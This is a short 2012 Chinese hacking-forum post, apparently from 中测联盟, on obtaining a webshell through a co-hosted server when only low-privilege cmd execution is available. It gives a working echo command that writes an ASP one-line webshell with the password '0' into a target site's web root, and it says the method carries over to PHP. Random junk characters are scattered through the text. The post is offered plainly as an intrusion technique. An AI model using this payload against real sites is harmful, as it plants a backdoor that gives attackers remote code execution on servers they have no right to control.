找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1985|回复: 0
打印 上一主题 下一主题

旁注cmd低权限下拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:40:24 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
7 c3 ?2 F  |% `( p. g' b
- U& i4 c' g/ U& g: V命令格式& x# J: j, l7 L2 ]- T/ o8 K
( O) h* X! `. V
Echo 语句 >目标站绝对目录- b$ m/ t1 {7 \# {0 M" E
; e% C+ G- Y/ n" B' x0 }# J' G
例如: 9 S/ P/ N. f( q+ y: x
  x0 }. E, K$ B
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
, p& U1 n$ p1 C; t
9 O  K* `" n% f+ s5 ~% L: o* Y: F这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。6 k, X) h4 L$ W# W" `. s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表